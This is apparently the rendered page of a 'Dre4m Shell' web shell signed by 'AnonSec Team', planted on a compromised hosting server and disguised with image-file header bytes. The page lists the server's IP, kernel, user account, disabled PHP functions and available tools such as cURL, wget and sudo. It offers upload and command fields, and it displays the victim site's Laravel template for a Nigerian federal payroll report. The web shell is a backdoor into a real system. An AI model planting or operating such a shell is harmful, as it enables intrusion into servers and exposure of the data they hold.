ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 18.227.114.26
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/consolidated/resources/views/inactiveStaff/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/consolidated/resources/views/inactiveStaff/report.blade.php
@extends('layouts.layout')

@section('pageTitle')
 FEDERAL GOVERNMENT OF NIGERIA
	PAYMENT VOUCHER
@endsection

@section('content')
<div align="center" style="padding:0 2%;">
        <div class="row">
            <div class="col-md-12">
                <div align="center"><h2><strong>FEDERAL GOVERNMENT OF NIGERIA PAYROLL</strong></h2></div>
            </div>
        </div>
     
        <table class="table table-condensed">
            <tr>
                <td>
                    <table class="table table-condensed">
                            <tr>
                                <td style="border: none;"><div class="text-left">Payroll P.V. No: </div></td>
                            </tr>
                            <tr>
                                <td style="border: none;"><div class="text-left">MINISTRY/DEPARTMENT: NATIONAL INDUSTRIAL COURT OF NIGERIA, DIVISION</div></td>
                            </tr>
                    </table>
                </td>
                <td>
                    <table class="table table-condensed" style="border: none;">
                            <tr>
                                <td style="border: none;"><div class="text-left">Sheet No: </div></td>
                            </tr>
                    </table>
                </td>
            </tr>
        </table>

      <div align="center"><h5><strong>Staff on {{$reportHeader}}</strong></h5></div>
      <br />
      <div class="row">
        <div class="col-md-12">
          
          <table class="table table-responsive table-bordered table-striped">
              <thead>
                    <tr>
                        <th><div align="center">FILE NO</div></th>
                        <th><div align="center">FULL NAME</div></th>
                        <th><div align="center">GRADE</div></th>
                        <th><div align="center">STEP</div></th>
                        <th><div align="center">BANK</div></th>
                        <th><div align="center">BANK GROUP</div></th>
                    </tr>
              <thead>
              <tbody>
               @foreach($staffStatus as $status)
                    <tr>
                        <td class="text-center">{{$status -> fileNo}}</td>
                        <td class="text-left">{{$status -> surname ." ". $status -> first_name ." ". $status -> othernames }}</td>
                        <td class="text-center">{{$status -> grade}}</td>
                        <td class="text-center">{{$status -> step}}</td>
                        <td class="text-left">{{$status -> bank}}</td>
                        <td class="text-center">{{$status -> bankGroup}}</td>
                    </tr>
               @endforeach
                    <tr>
                        <td colspan="6">
                        <div align="left">
                                <strong>{{"TOTAL: " . $totalStatus}}</strong>
                        </div>
                        </td>
                    </tr>
              </tbody>
        </table>

    </div>
    </div>

    <br/>
    <br/>

  </div><!--end main div=center-->
@endsection











Anon7 - 2022
AnonSec Team